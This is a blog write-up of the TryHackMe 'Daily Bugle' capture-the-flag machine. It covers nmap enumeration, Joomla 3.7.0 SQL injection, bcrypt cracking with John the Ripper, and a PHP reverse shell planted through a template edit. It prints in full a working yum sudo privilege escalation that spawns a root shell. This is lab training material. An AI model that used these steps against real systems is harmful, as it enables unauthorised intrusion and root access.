Open in app

Sign in

Write

Sign in

Try Hack Me: Daily Bugle Write-up

Max Register
4 min readOct 6, 2021

This spider man themed machine is part of the Offensive Security learning path on tryhackme.com; follow along as we exploit Joomla CMS with SQL Injection, crack passwords with John the ripper, and take advantage of yum for privilege escalation!

Enumeration

Firstly, lets run an Nmap scan with the following command:

>nmap -sC -sV <TARGET IP> -oN initial.nmap
# Nmap 7.91 scan initiated Tue Oct  5 22:17:37 2021 as: nmap -sC -sV -oN initial.nmap <TARGET IP>
Nmap scan report for <TARGET IP>
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct  5 22:18:23 2021 -- 1 IP address (1 host up) scanned in 46.00 seconds

Just two open ports on this machine, a webserver and SSH. Note the /joomla/ directory in the webserver. Taking a look at the web server we are greeted with the following Daily Bugle news site:

Daily Bugle Site

This website is likely running Joomla! from our initial Nmap scan and we can look around the internet for ways in which to enumerate the version and confirm our suspicions.

Hacker target has a post about Joomla! enumeration, so let’s use that! Looking through the site we see we can find the version in a file called:

/language/en-GB/en-GB.xml

Going to that page yields the following:

Joomla! 3.7.0

Awesome! We have confirmed that our site is running Joomla! and enumerated it’s version to be 3.7.0; let’s see if there are any public exploits with this software and version.

SQL Injection

We can use the joomblah.py exploit on GitHub to run some SQL injection and dump the tables in our target site.

Password Cracking

Great, we now have credentials with a username and a password hash! Using the OG tool John the Ripper we can crack the password using the following command:

> john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

After awhile, we will get our cracked password hash!

Gaining a Foothold

Using the credentials we now have we can login to the Joomla! /administrator/ login prompt to be brought to the command panel. After a bit of research we can see that hacking articles has posted a method of gaining a reverse shell on the system. Following their post, we are directed to the plugin Beez3 templet index.php file that we replace with our shell code.

using pentestmonkeys php reverse shell

After we have replaced the code with our shell code we simply click Template Preview and our shell is born.

initial shell

Privilege Escalation

After gaining our shell we can start looking for opportunities for privilege escalation. If we look at our /var/www/html/configuration.php file we see we have plain text credentials.

Try using this password with the only user account jjameson with the following command:

su jjameson

It works! We can now grab the user flag and continue looking for a way to root privileges. Running the following command will give us an option:

sudo -l

We can see here that our user account can run yum without a password as root. GTFObins has a solution to getting to root using yum. Following and copying the command listed will yield us root.

[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
TF=$(mktemp -d)                                               
[jjameson@dailybugle tmp]$ cat >$TF/x<<EOF                    
cat >$TF/x<<EOF
> [main]
[main]
> plugins=1
plugins=1
> pluginpath=$TF
pluginpath=$TF
> pluginconfpath=$TF
pluginconfpath=$TF
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<<EOF
cat >$TF/y.conf<<EOF
> [main]
[main]
> enabled=1
enabled=1
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<<EOF
cat >$TF/y.py<<EOF
> import os
import os
> import yum
import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
requires_api_version='2.1'
> def init_hook(conduit):
def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
  os.execl('/bin/sh','/bin/sh')
> EOF
EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
whoami
root

Success, we are now root! Grab that flag and celebrate.

Thank you for reading my writeup, happy hacking!

Infosec
Writeup
Tryhackme

--

--

Max Register

Written by Max Register

11 Followers

Information Security Writer

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams